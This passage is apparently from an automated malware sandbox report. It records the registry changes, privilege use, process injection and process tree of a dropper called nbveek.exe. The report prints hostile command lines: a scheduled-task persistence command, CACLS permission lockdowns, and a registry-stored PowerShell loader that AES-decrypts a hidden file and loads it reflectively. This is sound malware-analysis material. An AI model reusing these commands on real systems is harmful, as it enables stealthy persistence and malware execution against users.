\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe -
Modifies registry class 39 IoCs
Processes:
Explorer.EXEpowershell.exerundll32.exesvchost.exesvchost.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 50003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\amg0gg0kcwh powershell.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\amg0gg0kcwh\shell powershell.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\amg0gg0kcwh\shell\open powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 820074001c0043465346160031000000000000000000100041707044617461000000741a595e96dfd3488d671733bcee28bac5cdfadf9f6756418947c5c76bc0b67f400009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004100700070004400610074006100000042000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\amg0gg0kcwh\shell\open\command\ = "powershell -command \"$A=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$A.Key=@([byte]43,40,34,231,152,221,253,185,62,148,240,241,99,206,96,33,14,60,169,236,234,238,30,154,71,251,34,196,130,93,105,193);$A.IV=@([byte]12,149,177,4,191,6,243,253,155,163,193,103,144,104,239,238);$F=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\rf1pzoxxi3t.iqejof24z4a'));[Reflection.Assembly]::Load($A.CreateDecryptor().TransformFinalBlock($F,0,$F.Length));[xF9MBhD11Uboko4.PbxDwsvP6fEK0qiF26sgtXEsvZYYfDOk56NDcpRwBQsm5JPMxpMT0PxTTSJxPvtdOqtePwvITy4GLpW8H]::SaDHVXEPeR09i1FG9E5Li7xIYPSH();\"" powershell.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2629973501-4017243118-3254762364-1000\{3AACBEAB-8B99-49AD-8FEE-08AC28563690} svchost.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots rundll32.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2629973501-4017243118-3254762364-1000\{3D40337F-ADDE-477E-963B-6DC3F6486AA2} svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\amg0gg0kcwh\shell\open\command powershell.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f44471a0359723fa74489c55595fe6b30ee0000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.iqejof24z4a powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.iqejof24z4a\ = "amg0gg0kcwh" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4e003100000000003f56cf82100054656d7000003a0009000400efbe0c5519993f56d2822e00000000000000000000000000000000000000000000000000cac2c200540065006d007000000014000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 Explorer.EXE -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 79 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
Explorer.EXEpid process 376 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
moda.exetrena1.exemoda1.exedruid1.exedruid.exeOwvtknErB0Wl.exenitka.exefular.exeWerFault.exenitka1.exepid process 4320 moda.exe 4320 moda.exe 3348 trena1.exe 3348 trena1.exe 260 moda1.exe 260 moda1.exe 4124 druid1.exe 3232 druid.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 4124 3232 druid.exe 3200 nitka.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2332 OwvtknErB0Wl.exe 2908 fular.exe 3200 nitka.exe 4740 WerFault.exe 2908 fular.exe 4976 nitka1.exe 4740 WerFault.exe 4976 nitka1.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 376 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 656 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
ChromeSetup.exepid process 2656 ChromeSetup.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
moda.exetrena1.exemoda1.exenitka.exedruid1.exedruid.exenitka1.exefular.exeWerFault.exefular1.exevina1.exepowershell.exepowershell.exepowershell.exeExplorer.EXEpowershell.exepowercfg.exepowershell.exesc.exepowercfg.exereg.exedescription pid process Token: SeDebugPrivilege 4320 moda.exe Token: SeDebugPrivilege 3348 trena1.exe Token: SeDebugPrivilege 260 moda1.exe Token: SeDebugPrivilege 3200 nitka.exe Token: SeDebugPrivilege 4124 druid1.exe Token: SeDebugPrivilege 3232 druid.exe Token: SeDebugPrivilege 4976 nitka1.exe Token: SeDebugPrivilege 2908 fular.exe Token: SeDebugPrivilege 4740 WerFault.exe Token: SeDebugPrivilege 432 fular1.exe Token: SeShutdownPrivilege 3952 vina1.exe Token: SeCreatePagefilePrivilege 3952 vina1.exe Token: SeDebugPrivilege 2708 powershell.exe Token: SeDebugPrivilege 5108 powershell.exe Token: SeDebugPrivilege 4188 powershell.exe Token: SeShutdownPrivilege 376 Explorer.EXE Token: SeCreatePagefilePrivilege 376 Explorer.EXE Token: SeShutdownPrivilege 376 Explorer.EXE Token: SeCreatePagefilePrivilege 376 Explorer.EXE Token: SeShutdownPrivilege 376 Explorer.EXE Token: SeCreatePagefilePrivilege 376 Explorer.EXE Token: SeShutdownPrivilege 376 Explorer.EXE Token: SeCreatePagefilePrivilege 376 Explorer.EXE Token: SeShutdownPrivilege 376 Explorer.EXE Token: SeCreatePagefilePrivilege 376 Explorer.EXE Token: SeShutdownPrivilege 376 Explorer.EXE Token: SeCreatePagefilePrivilege 376 Explorer.EXE Token: SeShutdownPrivilege 376 Explorer.EXE Token: SeCreatePagefilePrivilege 376 Explorer.EXE Token: SeShutdownPrivilege 376 Explorer.EXE Token: SeCreatePagefilePrivilege 376 Explorer.EXE Token: SeShutdownPrivilege 376 Explorer.EXE Token: SeCreatePagefilePrivilege 376 Explorer.EXE Token: SeShutdownPrivilege 376 Explorer.EXE Token: SeCreatePagefilePrivilege 376 Explorer.EXE Token: SeShutdownPrivilege 376 Explorer.EXE Token: SeCreatePagefilePrivilege 376 Explorer.EXE Token: SeDebugPrivilege 3152 powershell.exe Token: SeShutdownPrivilege 1548 powercfg.exe Token: SeCreatePagefilePrivilege 1548 powercfg.exe Token: SeDebugPrivilege 2104 powershell.exe Token: SeShutdownPrivilege 1124 sc.exe Token: SeCreatePagefilePrivilege 1124 sc.exe Token: SeShutdownPrivilege 376 Explorer.EXE Token: SeCreatePagefilePrivilege 376 Explorer.EXE Token: SeShutdownPrivilege 260 powercfg.exe Token: SeCreatePagefilePrivilege 260 powercfg.exe Token: SeShutdownPrivilege 3948 reg.exe Token: SeCreatePagefilePrivilege 3948 reg.exe Token: SeIncreaseQuotaPrivilege 2104 powershell.exe Token: SeSecurityPrivilege 2104 powershell.exe Token: SeTakeOwnershipPrivilege 2104 powershell.exe Token: SeLoadDriverPrivilege 2104 powershell.exe Token: SeSystemProfilePrivilege 2104 powershell.exe Token: SeSystemtimePrivilege 2104 powershell.exe Token: SeProfSingleProcessPrivilege 2104 powershell.exe Token: SeIncBasePriorityPrivilege 2104 powershell.exe Token: SeCreatePagefilePrivilege 2104 powershell.exe Token: SeBackupPrivilege 2104 powershell.exe Token: SeRestorePrivilege 2104 powershell.exe Token: SeShutdownPrivilege 2104 powershell.exe Token: SeDebugPrivilege 2104 powershell.exe Token: SeSystemEnvironmentPrivilege 2104 powershell.exe Token: SeRemoteShutdownPrivilege 2104 powershell.exe -
Suspicious use of FindShellTrayWindow 8 IoCs
Processes:
Russian.exe.pifExplorer.EXErundll32.exepid process 1444 Russian.exe.pif 376 Explorer.EXE 376 Explorer.EXE 1444 Russian.exe.pif 1444 Russian.exe.pif 376 Explorer.EXE 376 Explorer.EXE 3948 rundll32.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
Russian.exe.pifpid process 1444 Russian.exe.pif 1444 Russian.exe.pif 1444 Russian.exe.pif -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
OpenWith.exeExplorer.EXEpid process 1516 OpenWith.exe 376 Explorer.EXE 376 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exenbveek.execmd.exelebro.exenbveek.execmd.exedescription pid process target process PID 1976 wrote to memory of 628 1976 f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe nbveek.exe PID 1976 wrote to memory of 628 1976 f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe nbveek.exe PID 1976 wrote to memory of 628 1976 f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe nbveek.exe PID 628 wrote to memory of 4964 628 nbveek.exe schtasks.exe PID 628 wrote to memory of 4964 628 nbveek.exe schtasks.exe PID 628 wrote to memory of 4964 628 nbveek.exe schtasks.exe PID 628 wrote to memory of 872 628 nbveek.exe cmd.exe PID 628 wrote to memory of 872 628 nbveek.exe cmd.exe PID 628 wrote to memory of 872 628 nbveek.exe cmd.exe PID 872 wrote to memory of 4636 872 cmd.exe cmd.exe PID 872 wrote to memory of 4636 872 cmd.exe cmd.exe PID 872 wrote to memory of 4636 872 cmd.exe cmd.exe PID 872 wrote to memory of 4600 872 cmd.exe cacls.exe PID 872 wrote to memory of 4600 872 cmd.exe cacls.exe PID 872 wrote to memory of 4600 872 cmd.exe cacls.exe PID 872 wrote to memory of 4660 872 cmd.exe cacls.exe PID 872 wrote to memory of 4660 872 cmd.exe cacls.exe PID 872 wrote to memory of 4660 872 cmd.exe cacls.exe PID 872 wrote to memory of 1772 872 cmd.exe cmd.exe PID 872 wrote to memory of 1772 872 cmd.exe cmd.exe PID 872 wrote to memory of 1772 872 cmd.exe cmd.exe PID 872 wrote to memory of 3504 872 cmd.exe cacls.exe PID 872 wrote to memory of 3504 872 cmd.exe cacls.exe PID 872 wrote to memory of 3504 872 cmd.exe cacls.exe PID 872 wrote to memory of 2128 872 cmd.exe cacls.exe PID 872 wrote to memory of 2128 872 cmd.exe cacls.exe PID 872 wrote to memory of 2128 872 cmd.exe cacls.exe PID 628 wrote to memory of 4320 628 nbveek.exe moda.exe PID 628 wrote to memory of 4320 628 nbveek.exe moda.exe PID 628 wrote to memory of 3348 628 nbveek.exe trena1.exe PID 628 wrote to memory of 3348 628 nbveek.exe trena1.exe PID 628 wrote to memory of 4124 628 nbveek.exe druid1.exe PID 628 wrote to memory of 4124 628 nbveek.exe druid1.exe PID 628 wrote to memory of 4124 628 nbveek.exe druid1.exe PID 628 wrote to memory of 3200 628 nbveek.exe nitka.exe PID 628 wrote to memory of 3200 628 nbveek.exe nitka.exe PID 628 wrote to memory of 3200 628 nbveek.exe nitka.exe PID 628 wrote to memory of 260 628 nbveek.exe moda1.exe PID 628 wrote to memory of 260 628 nbveek.exe moda1.exe PID 628 wrote to memory of 3232 628 nbveek.exe druid.exe PID 628 wrote to memory of 3232 628 nbveek.exe druid.exe PID 628 wrote to memory of 3232 628 nbveek.exe druid.exe PID 628 wrote to memory of 4976 628 nbveek.exe nitka1.exe PID 628 wrote to memory of 4976 628 nbveek.exe nitka1.exe PID 628 wrote to memory of 4976 628 nbveek.exe nitka1.exe PID 628 wrote to memory of 3168 628 nbveek.exe lebro.exe PID 628 wrote to memory of 3168 628 nbveek.exe lebro.exe PID 628 wrote to memory of 3168 628 nbveek.exe lebro.exe PID 3168 wrote to memory of 3376 3168 lebro.exe nbveek.exe PID 3168 wrote to memory of 3376 3168 lebro.exe nbveek.exe PID 3168 wrote to memory of 3376 3168 lebro.exe nbveek.exe PID 3376 wrote to memory of 3264 3376 nbveek.exe schtasks.exe PID 3376 wrote to memory of 3264 3376 nbveek.exe schtasks.exe PID 3376 wrote to memory of 3264 3376 nbveek.exe schtasks.exe PID 3376 wrote to memory of 5052 3376 nbveek.exe cmd.exe PID 3376 wrote to memory of 5052 3376 nbveek.exe cmd.exe PID 3376 wrote to memory of 5052 3376 nbveek.exe cmd.exe PID 5052 wrote to memory of 4148 5052 cmd.exe cmd.exe PID 5052 wrote to memory of 4148 5052 cmd.exe cmd.exe PID 5052 wrote to memory of 4148 5052 cmd.exe cmd.exe PID 5052 wrote to memory of 4888 5052 cmd.exe cacls.exe PID 5052 wrote to memory of 4888 5052 cmd.exe cacls.exe PID 5052 wrote to memory of 4888 5052 cmd.exe cacls.exe PID 628 wrote to memory of 2908 628 nbveek.exe fular.exe -
outlook_office_path 1 IoCs
Processes:
rundll32.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook rundll32.exe -
outlook_win_path 1 IoCs
Processes:
rundll32.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe"C:\Users\Admin\AppData\Local\Temp\f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\5eb6b96734\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\5eb6b96734\nbveek.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\5eb6b96734\nbveek.exe" /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\5eb6b96734" /P "Admin:N"&&CACLS "..\5eb6b96734" /P "Admin:R" /E&&Exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\5eb6b96734" /P "Admin:N"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\5eb6b96734" /P "Admin:R" /E5⤵
-
C:\Users\Admin\AppData\Local\Temp\1000001001\moda.exe"C:\Users\Admin\AppData\Local\Temp\1000001001\moda.exe"4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000002001\trena1.exe"C:\Users\Admin\AppData\Local\Temp\1000002001\trena1.exe"4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000003051\druid1.exe"C:\Users\Admin\AppData\Local\Temp\1000003051\druid1.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000004051\nitka.exe"C:\Users\Admin\AppData\Local\Temp\1000004051\nitka.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3200 -s 12325⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000005001\moda1.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\moda1.exe"4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000006051\druid.exe"C:\Users\Admin\AppData\Local\Temp\1000006051\druid.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000007001\nitka1.exe"C:\Users\Admin\AppData\Local\Temp\1000007001\nitka1.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 20685⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000008001\lebro.exe"C:\Users\Admin\AppData\Local\Temp\1000008001\lebro.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "Admin:N"&&CACLS "..\9e0894bcc4" /P "Admin:R" /E&&Exit6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵
-
